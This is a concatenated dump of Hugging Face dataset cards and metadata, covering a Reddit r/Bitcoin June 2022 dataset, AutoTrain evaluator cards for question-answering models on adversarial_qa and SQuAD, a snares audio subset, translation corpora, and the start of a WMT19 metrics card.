## Additional Information
### Licensing Information
CC-BY v4.0
| [
"# Dataset Card for reddit-r-bitcoin-data-for-jun-2022",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Licensing Information",
"## Dataset Description\n\n- Homepage: URL\n- Reddit downloader used: URL\n- Point of Contact: Website",
"### Dataset Summary\n\nLite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.",
"### Languages\n\nMainly English.",
"## Dataset Structure",
"### Data Instances\n\nA data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.",
"### Data Fields\n\n- 'type': the type of the data point. Can be 'post' or 'comment'.\n- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.\n- 'URL': the base-36 Reddit ID of the data point's host subreddit. Unique.\n- 'URL': the human-readable name of the data point's host subreddit.\n- 'URL': a boolean marking the data point's host subreddit as NSFW or not.\n- 'created_utc': a UTC timestamp for the data point.\n- 'permalink': a reference link to the data point on Reddit.\n- 'score': score of the data point on Reddit.\n\n- 'domain': (Post only) the domain of the data point's link.\n- 'url': (Post only) the destination of the data point's link, if any.\n- 'selftext': (Post only) the self-text of the data point, if any.\n- 'title': (Post only) the title of the post data point.\n\n- 'body': (Comment only) the body of the comment data point.\n- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.",
"## Additional Information",
"### Licensing Information\n\nCC-BY v4.0"
] | [
"TAGS\n#annotations_creators-lexyr #language_creators-crowdsourced #multilinguality-monolingual #size_categories-100K<n<1M #source_datasets-original #language-English #license-cc-by-4.0 #region-us \n",
"# Dataset Card for reddit-r-bitcoin-data-for-jun-2022",
"## Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Licensing Information",
"## Dataset Description\n\n- Homepage: URL\n- Reddit downloader used: URL\n- Point of Contact: Website",
"### Dataset Summary\n\nLite version of our premium Reddit /r/Bitcoin dataset - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.",
"### Languages\n\nMainly English.",
"## Dataset Structure",
"### Data Instances\n\nA data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.",
"### Data Fields\n\n- 'type': the type of the data point. Can be 'post' or 'comment'.\n- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.\n- 'URL': the base-36 Reddit ID of the data point's host subreddit. Unique.\n- 'URL': the human-readable name of the data point's host subreddit.\n- 'URL': a boolean marking the data point's host subreddit as NSFW or not.\n- 'created_utc': a UTC timestamp for the data point.\n- 'permalink': a reference link to the data point on Reddit.\n- 'score': score of the data point on Reddit.\n\n- 'domain': (Post only) the domain of the data point's link.\n- 'url': (Post only) the destination of the data point's link, if any.\n- 'selftext': (Post only) the self-text of the data point, if any.\n- 'title': (Post only) the title of the post data point.\n\n- 'body': (Comment only) the body of the comment data point.\n- 'sentiment': (Comment only) the result of an in-house sentiment analysis pipeline. Used for exploratory analysis.",
"## Additional Information",
"### Licensing Information\n\nCC-BY v4.0"
] |
24f194c5b6ef29eb784ea3508a022ba848beeea4 |
Kbd latin script: 835k lines from a scraped pile
ru: 3M lines from Wiki (OPUS) | anzorq/kbd_lat-835k_ru-3M | [
"license:unknown",
"region:us"
] | 2022-07-25T17:37:51+00:00 | {"license": "unknown"} | 2022-07-25T22:26:41+00:00 | [] | [] | TAGS
#license-unknown #region-us
|
Kbd latin script: 835k lines from a scraped pile
ru: 3M lines from Wiki (OPUS) | [] | [
"TAGS\n#license-unknown #region-us \n"
] |
71d820d52a2662dd708036a15374bbbd68ff57b9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825575 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:32+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:33:19+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
e53695a23047a407d2999206a03fc82701148a78 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825576 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:30:35+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:32:36+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
2803c28d2003a2afff2a01b409ff7cd42fb0fb17 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-58460439-11825574 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:32:16+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
4deeac719a3ff3df9b5866646f38a35bc45e3c0b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835577 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:38:58+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
34c8374562d8b0e8846c1b926bbe84f4aef4dca5 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835578 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/electra-large-synqa", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/electra-large-synqa
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/electra-large-synqa\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
f329c4e36fa98c42ab3d616e01018048364d47e2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835579 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:34:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:01+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
29dd17d42866336178ac700cbb45bce287a38a34 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo ](https://huggingface.co/mbartolo ) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-95d5e1fd-11835580 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T21:35:07+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T21:39:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
cdfeb9020eb204c2b5b4e28ac3ef7b18a658cb76 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845582 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:18:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa-ext", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:20:32+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa-ext
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa-ext\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa-ext\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
8082af326609adb4497e5770cb5c05824349d0ef | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@mbartolo](https://huggingface.co/mbartolo) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-adversarial_qa-8ac5f360-11845581 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T22:20:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["adversarial_qa"], "eval_info": {"task": "extractive_question_answering", "model": "mbartolo/roberta-large-synqa", "metrics": [], "dataset_name": "adversarial_qa", "dataset_config": "adversarialQA", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T22:26:00+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: mbartolo/roberta-large-synqa
* Dataset: adversarial_qa
* Config: adversarialQA
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @mbartolo for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: mbartolo/roberta-large-synqa\n* Dataset: adversarial_qa\n* Config: adversarialQA\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @mbartolo for evaluating this model."
] |
dc842ba21530077e2385514585f385e671eb9f32 |
# Snares
FSD50K subset of just snares.
```
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.csv
wget -nc https://huggingface.co/datasets/nateraw/snares/resolve/main/snares.zip
unzip snares.zip
```
If you unpack as described above, `snares.csv` will have correct filepath to audio file when loaded in as CSV. Here we show with pandas...
```python
import pandas as pd
df = pd.read_csv('snares.csv')
``` | nateraw/snares | [
"language:en",
"license:other",
"region:us"
] | 2022-07-26T00:38:47+00:00 | {"language": "en", "license": "other"} | 2022-07-26T00:48:47+00:00 | [] | [
"en"
] | TAGS
#language-English #license-other #region-us
|
# Snares
FSD50K subset of just snares.
If you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas...
| [
"# Snares \n\nFSD50K subset of just snares.\n\n\n\nIf you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas..."
] | [
"TAGS\n#language-English #license-other #region-us \n",
"# Snares \n\nFSD50K subset of just snares.\n\n\n\nIf you unpack as described above, 'URL' will have correct filepath to audio file when loaded in as CSV. Here we show with pandas..."
] |
cdeb4ea38252c283f5717b007ae8f8d5c5d3c73f | annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: [] | Kamrani/en-fa-translation | [
"region:us"
] | 2022-07-26T02:10:34+00:00 | {} | 2022-07-30T03:13:38+00:00 | [] | [] | TAGS
#region-us
| annotations_creators:
- no-annotation
language:
- en
- fa
language_creators:
- crowdsourced
license:
- other
multilinguality:
- multilingual
pretty_name: en-fa-translation
size_categories:
- 1M<n<10M
source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: [] | [] | [
"TAGS\n#region-us \n"
] |
e16e967d01e8a5e796eef1ec263c83b2c3f3fac3 |
The prompts used in the Simulacra discord bot and [released](https://github.com/JD-P/simulacra-aesthetic-captions)
Thanks to deltawave on discord for supplying this dataset! | BirdL/SimulaPrompts | [
"license:cc0-1.0",
"region:us"
] | 2022-07-26T03:52:06+00:00 | {"license": "cc0-1.0"} | 2022-12-19T22:06:33+00:00 | [] | [] | TAGS
#license-cc0-1.0 #region-us
|
The prompts used in the Simulacra discord bot and released
Thanks to deltawave on discord for supplying this dataset! | [] | [
"TAGS\n#license-cc0-1.0 #region-us \n"
] |
8078e27c5ff4c52d5b85572ed45d36c712a3c423 |
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [WMT19 Metrics Shared Task](https://www.statmt.org/wmt19/metrics-task.html)
- **Repository:** [MT Metrics Eval Github Repository](https://github.com/google-research/mt-metrics-eval)
- **Paper:** [Paper](https://aclanthology.org/W19-5302/)
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
The dataset comprises the following language pairs:
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@github-username](https://github.com/mustaszewski) for adding this dataset.
| muibk/wmt19_metrics_task | [
"task_categories:translation",
"annotations_creators:expert-generated",
"language_creators:found",
"language_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:translation",
"size_categories:100K<n<1M",
